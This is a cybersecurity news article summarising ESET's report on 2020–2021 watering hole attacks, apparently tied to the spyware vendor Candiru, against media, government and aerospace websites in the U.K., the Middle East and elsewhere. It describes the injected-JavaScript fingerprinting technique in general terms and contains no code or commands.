Israeli spyware vendor Candiru, which was added to an economic blocklist by the U.S. government this month, is said to have reportedly waged "watering hole" attacks against high-profile entities in the U.K. and the Middle East, new findings reveal.

"The victimized websites belong to media outlets in the U.K., Yemen, and Saudi Arabia, as well as to Hezbollah; to government institutions in Iran (Ministry of Foreign Affairs), Syria (including the Ministry of Electricity), and Yemen (including the Ministries of Interior and Finance); to internet service providers in Yemen and Syria; and to aerospace/military technology companies in Italy and South Africa," ESET said in a new report. "The attackers also created a website mimicking a medical trade fair in Germany."

The strategic web compromises are believed to have occurred in two waves, the first commencing as early as March 2020 before ending in August 2020, and the second string of attacks beginning in January 2021 and lasting until early August 2021, when the targeted websites were stripped clean off the malicious scripts.


Watering hole attacks are a form of highly targeted intrusions in that they tend to infect a specific group of end-users by backdooring websites that members of the group are known to frequent with the goal of opening a gateway into their machines for follow-on exploitation activities.

"The compromised websites are only used as a jumping-off point to reach the final targets," the Slovak cybersecurity firm said, linking the second wave to a threat actor tracked by Kaspersky as Karkadann citing overlaps in the tactics, techniques, and procedures (TTPs). The Russian company described the group as targeting government bodies and news outlets in the Middle East since at least October 2020.

The original attack chains involved injecting JavaScript code into the websites from a remote attacker-controlled domain that's designed to collect and exfiltrated I.P. geolocation and system information about the victim machine, opting to proceed further only if the operating system in question is either Windows or macOS, suggesting the campaign was orchestrated to target computers and not mobile devices. The final step led to a likely browser remote code execution exploit that enabled the attackers to hijack control of the machines.

The second wave observed in January 2021 was characterized by more stealth, as the JavaScript modifications were made to legitimate WordPress scripts ("wp-embed.min.js") used by the websites instead of adding the malicious code straight to the main HTML page, using the method to load a script from a server under the attacker's control. What's more, the fingerprinting script also went beyond harvesting system metadata to capture the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins.


The exact exploit and the final payload delivered remain unknown as yet. "This shows that the operators choose to narrow the focus of their operations and that they don't want to burn their zero-day exploits," ESET malware researcher Matthieu Faou said.

The campaign's links to Candiru stems from the fact that some of the command-and-control servers utilized by the attackers are similar to domains previously identified as belonging to the Israeli company, not to mention feature browser-based remote code execution exploits in its arsenal, raising the possibility that "the operators of the watering holes are customers of Candiru."

ESET also noted that the attackers ceased operations at the end of July 2021, coinciding with public disclosures about Candiru related to the use of multiple zero-day vulnerabilities in Chrome web browser to target victims located in Armenia. "It seems that the operators are taking a pause, probably in order to retool and make their campaign stealthier," Faou said. "We expect to see them back in the ensuing months."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.